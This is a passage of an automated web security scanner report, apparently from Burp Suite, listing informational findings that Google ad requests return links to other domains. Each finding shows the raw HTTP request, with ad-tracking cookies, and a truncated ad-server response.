User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:19:39 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1771

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=-oTsvI3N5T_6hOy8jc3lPwAAAMDMzARA-oTsvI3N5T_5hOy8jc3lP3oEoPofFMtWSsYda6b2ziWLP7RNAAAAAD8wAAC1AAAAlgIAAAIAAADIpAIA0WMAAAEAAABVU0QAVVNEANgCWgAbC0sAJgcBAgUCAAQAAAAAoyo52gAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303658379%29%3Buf%28%27c%27%2C+52368%2C+1303658379%29%3Buf%28%27r%27%2C+173256%2C+1303658379%29%3Bppv%288991%2C+%276254114635115398266%27%2C+1303658379%2C+1303701579%2C+52368%2C+25553%29%3B&cnd=!CxAduAiQmQMQyMkKGAAg0ccBKEsxRkF1FY7N5T9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..&pp=TbQ_iwAFgNoK5XTMHexz4Xmkvxrm18k8jxHI-Q&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB6yJFiz-0TdqBFszplQfh57HvAdfq-NMBr56U7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEJNzI4eDkwX2FzyAEJ2gFIaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl83MjhfOTBfYS5waHA_c2VhcmNoPSU3QiRrZXl3b3JkJTdEmALoAsACBMgChdLPCqgDAegDvAHoA5QC9QMAAADEgAb746GF_uDvrsAB%26num%3D1%26sig%3DAGiWqtzhYE0HpLf5jfKnnqXc2D78-PNaCw%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.402. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679416&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661416523&bpp=2&shv=r20110420&jsv=r20110415&correlator=1303661416527&frm=1&adk=2614322350&ga_vid=287691324.1303661417&ga_sid=1303661417&ga_hid=61650082&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:10:13 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14483

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</a>&nbsp;<img alt="" class=cbg height=10 src="http://pagead2.googlesyndication.com/pagead/badge/checkout_999999.gif" title="This site accepts Google Checkout" width=19><div class=adb>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Amazon.com%26adT%3DArnazon.com%25C2%25AE%2B-%2BShop%26adU%3DPeru.travel%26adT%3DAmazonia%2BMuseums%26adU%3Dwww.webgility.com%26adT%3DAmazon%2B-sync-%2BQuickBooks%26adU%3DECKOHousePublishing.com%26adT%3DSell%2BYour%2BBook%2Bon%2BAmazon%26adU%3DDealfind.com/Chicago%26adT%3DChicago%2B1-Day%2BCoupons%26gl%3DUS&amp;usg=AFQjCNEIl9SuVqrYKoSGEsoKQ20R-sTmYg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.403. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303636784&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F23%2Fdork%2Flocal-file-inclusion-reflected-xss-dork-ghdb-www.nextadvisor.com_80.htm&dt=1303618810258&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303618811039&frm=0&adk=1819763764&ga_vid=1956937505.1303618812&ga_sid=1303618812&ga_hid=1530788247&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=891&eid=36815002%2C33895132&fu=0&ifi=1&dtd=1996&xpc=zFcEE1wUwg&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 04:20:12 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12293

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/23/dork/local-file-inclusion-reflected-xss-dork-ghdb-www.nextadvisor.com_80.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPECSforAll.com%26adT%3DFree%2BPECS%2B18000%252B%26adU%3Dwww.niu.edu/offcampusacademics%26adT%3DOnline%2BHealth%2BDegrees%26adU%3Dwww.cpfamilynetwork.org%26adT%3DCerebral%2BPalsy%2BResources%26gl%3DUS&amp;usg=AFQjCNF9FK94IaCIW16Ik0qkm3Kokpn7ow" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.404. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679499&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661499366&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303661499368&frm=1&adk=2614322350&ga_vid=1092725632.1303661499&ga_sid=1303661499&ga_hid=1352907092&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=4069653789&eid=33895130&fu=4&ifi=1&dtd=4 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_120_600_b.php?search={$keywa6d4b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:11:36 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14623

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</a>&nbsp;<img alt="" class=cbg height=10 src="http://pagead2.googlesyndication.com/pagead/badge/checkout_999999.gif" title="This site accepts Google Checkout" width=19><div class=adb>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Amazon.com%26adT%3DArnazon.com%25C2%25AE%2B-%2BShop%26adU%3DPeru.travel%26adT%3DAmazonia%2BMuseums%26adU%3Dwww.webgility.com%26adT%3DAmazon%2B-sync-%2BQuickBooks%26adU%3DDealfind.com/Chicago%26adT%3DChicago%2B1-Day%2BCoupons%26adU%3DMercedesCars.ConnectWithLife.com%26adT%3DMercedes-Benz%2BLiquidation%26gl%3DUS&amp;usg=AFQjCNEB9oljjiqFDLxm7zijQIidpNrdxw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.405. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303684999&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F24%2Fdork%2Fcontrolcasecom-contact%2Freflected-xss-cwe-79-ghdb-report-example-poc.html&dt=1303666998579&bpp=8&shv=r20110420&jsv=r20110415&correlator=1303666999028&frm=0&adk=1607234649&ga_vid=1223284299.1303666999&ga_sid=1303666999&ga_hid=2140432911&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=907&fu=0&ifi=1&dtd=509&xpc=B6TjS4xGPH&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 17:43:16 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12254

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/24/dork/controlcasecom-contact/reflected-xss-cwe-79-ghdb-report-example-poc.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.ironspeed.com%26adT%3DFree%2BC%2523%2Bcode%2Bgenerator%26adU%3Dwww.demyo.com%26adT%3DMake%2Byour%2Bbusiness%2Bsecure%26adU%3Dwww.ledgersonline.com%26adT%3DSimply%2BAccounting%2BOnline%26gl%3DUS&amp;usg=AFQjCNFQ59AtgwFnkkmwZvTvy5ephPzU-g" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.406. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679616&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661616983&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303661616985&frm=1&adk=2614322350&ga_vid=713049586.1303661617&ga_sid=1303661617&ga_hid=1858360584&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=4069653789&eid=33895130&fu=4&ifi=1&dtd=5 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_120_600_b.php?search={$keywa6d4b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:13:34 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2164

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25919918&ahcid=1089787&bimpd=NjumYd183li1RagKXPHl4zJBSmlLL3Dent3W9hZVSSWjt-lmIjisKXYtk0cxfCoqviBZB05Oxg-86kigsBDEeK9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BKTX2uj72I9GXI7eeNIzBneeyoFfUm2TbrHwZU0O9LZulgHBzIj8H9loLjUdnhyPRX-OTJHGejGxp7iHLGyOkzKzF3Y56invj3of6PKLgy5fgU2xBm3QHaMdsIoCKhXuXyRKhKXGgpt9ON4nDHaJZDdO5Ic1Tm7zMwsmC67vFMlBtC8cnfVoc-ffY0bjr9ypPula_qJLrXcrZr4baiYl_yn9VVK6_rwMQBzZUn9v7xi0hqZ7aZVDHmPPHvw4qFZy1waJQmyFM1l4x-S8oOkTR0WhneTrBKJPgkiiXrA82MwmMmAKf-fTCPDGWd8sW3YPeoMfJYxnPXg5QM4qQHcJp-g7NjMOSxqJylcziAJzN-mGX91mNtx9s8FQapZIbkQ1tNBrIEGL6Qi9P13I5nx5nfrUDDSQf7Ift07aelswxJAioByWRKoQ3oF0AT_2N-Em_gjdkSW0JhvnWXPD46RI-8Pt_T370WDWWY1SqEwEJwbhnBOUR0uKXwLnlzhRcF-z1FwKJb6pfzy6U4b-zmaBhHBA9y0FUzpqtDC0K6uSmpOaAE0HQb-VqGycWmukn0nOb6o408BxR9uazB8jKSDnLvk&acp=TbRMLgAAljwK5X5HHeFjM__szMt_CFh7hqb-ZA&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBWUh9Lky0TbysAsf8lQezxoXvAcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAbl8ongssKXiaIB%26num%3D1%26sig%3DAGiWqtxWSydZHAnroC8LWurusL7QCOEiyw%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.407. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679634&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661634553&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303661634566&frm=1&adk=2614322350&ga_vid=109594504.1303661635&ga_sid=1303661635&ga_hid=786452102&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=4069653789&eid=33895130&fu=4&ifi=1&dtd=15 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_120_600_b.php?search={$keywa6d4b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:13:51 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14676

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</a>&nbsp;<img alt="" class=cbg height=10 src="http://pagead2.googlesyndication.com/pagead/badge/checkout_999999.gif" title="This site accepts Google Checkout" width=19><div class=adb>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Amazon.com%26adT%3DArnazon.com%25C2%25AE%2B-%2BShop%26adU%3DPeru.travel%26adT%3DTourism%2B-%2BAmazonia%26adU%3Dwww.AmazonServices.com/ProductAds%26adT%3DAmazon%2BProduct%2BAds%26adU%3Dwww.webgility.com%26adT%3DAmazon%2B-sync-%2BQuickBooks%26adU%3DDealfind.com/Chicago%26adT%3DChicago%2B1-Day%2BCoupons%26gl%3DUS&amp;usg=AFQjCNHK19LNGL-HdybRNdcpcbh8JTnLoQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.408. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676553&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658553416&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658553422&frm=1&adk=513358139&ga_vid=780386006.1303658553&ga_sid=1303658553&ga_hid=1236518823&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&eid=44901218&fu=4&ifi=1&dtd=9 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:22:30 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2138

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689665&l=728x90&aid=25919898&ahcid=1089768&bimpd=4iscdcrQg2DEYB_fAgs1OTdufYS_9rVh88_KQClOIF8RZUVTgvOBmsYjEQ5AVGChbOaWINprEDeBxIrSTxP3xa9niBJoz6621irB3f190hVoi5oxQPyCItoVSlkU2GiEKa7xi-Yh-L5zIgjO7n9XM9W-SvPVZ9uvWN6QKCcGWsFt1AnXVvRUHCS3x0AwhdfJ3aw-YCEaz7QM4D5LAnxbQ7rSVSD8gxGQo9yWqnwnO2rMXyWWCw2Wg6_6Y5q9_p_bBbemAK5ac4pIU_r3DPlTr6SpNtS5xAFUzv3qcEVeuuxxX0onbqlp94UcyJZT3SBOKttow5g-rySYtOkVF8bTFqY_8_8Z7NXseqr49ZBcif04vrDQ0fB507iMqqrwe9-wCcJzEb1qj5xmeir2G5gfeRFOZkHQDULxzGhZ5miPO-MBK6o41OnjVGPDnFcPiw702t_rQ7srsXknm5tu1vimODn1FAv89x4axE5Jcvz3NtFMDIEtJeySEAHPBemokDuS-jC1UtHHNFwS9St3vhOQNuG-cgitwdOGy-1t1LkciqXUoPaaHnaoorULvxTzi44m1_Si-euS0zvZ4Sy6x3y4oCJ3_lrfOLHGp3Z7z6cdQ5yP-_WAToXeZqf2MtabD7lkVaOGOyExKJZTm-Y9XkyAdN-ahVAQAFXdGsFm3CQtVRNcURMhRM2LhpW-3_PATP0ldS_tt6tjHLWep1NYjOYOW8Y5mWoOHoF4xNoAiTtMvK6wrRTD9o2SJxjqGPytYYwfCN76B5My79hs6m5sVTatSA&acp=TbRANgAGvRUK5X5JH2pw8u